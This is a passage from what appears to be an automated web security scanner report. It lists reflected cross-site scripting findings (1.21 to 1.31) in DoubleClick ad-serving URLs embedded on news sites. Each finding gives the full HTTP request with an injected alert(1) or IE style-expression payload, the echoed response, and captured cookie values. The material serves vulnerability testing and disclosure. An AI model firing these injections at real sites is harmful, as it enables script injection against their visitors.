AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5More
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 862c5"-alert(1)-"b9cec4b80de was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csda
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e7f3"-alert(1)-"8abaf15a711 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:20:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/19f/%2a/c%3B234501632%3B1-0%3B0%3B57841699%3B3454-728/90%3B40013199/40030986/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2Ut
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/articletools_sponsor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 was submitted in the !category parameter. This input was echoed as f6345"style="x:expression(alert(1))"760be3c0573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 485

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;f6345"style="x:expression(alert(1))"760be3c0573;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/articletools_sponsor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b967b"style%3d"x%3aexpression(alert(1))"43f320cd246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b967b"style="x:expression(alert(1))"43f320cd246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;&b967b"style%3d"x%3aexpression(alert(1))"43f320cd246=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 488

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;&b967b"style="x:expression(alert(1))"43f320cd246=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 was submitted in the !category parameter. This input was echoed as 24f47"style="x:expression(alert(1))"ed49986df20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 604

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;24f47"style="x:expression(alert(1))"ed49986df20;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad783"style="x:expression(alert(1))"7c9d84b3db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;&ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 607

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;&ad783"style="x:expression(alert(1))"7c9d84b3db8=1;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 was submitted in the !category parameter. This input was echoed as 44e25"style="x:expression(alert(1))"92bb3f4bb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 532

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;1-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;44e25"style="x:expression(alert(1))"92bb3f4bb02;~aopt=6/0/ff/0;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

1.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a17"style="x:expression(alert(1))"c28df2770ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;&b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 537

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;0-0;0;31680223;1839-230/70;31981065/31998941/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;&b5a17"style="x:expression(alert(1))"c28df2770ea=1;~aopt=6/0/ff/0;~sscs=%3fhttps://www.wsjwine.com/discovery_offer.aspx?promo=2033001">
...[SNIP]...

1.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 was submitted in the u parameter. This input was echoed as 73876"style="x:expression(alert(1))"392e3d7bbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 429

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/l;44306;0-0;0;31680223;31596-2/94;0/0/0;u=;~okv=;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;73876"style="x:expression(alert(1))"392e3d7bbf7;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd5ff'-alert(1)-'9030ba385d0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ed56"-alert(1)-"dde2af71df5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

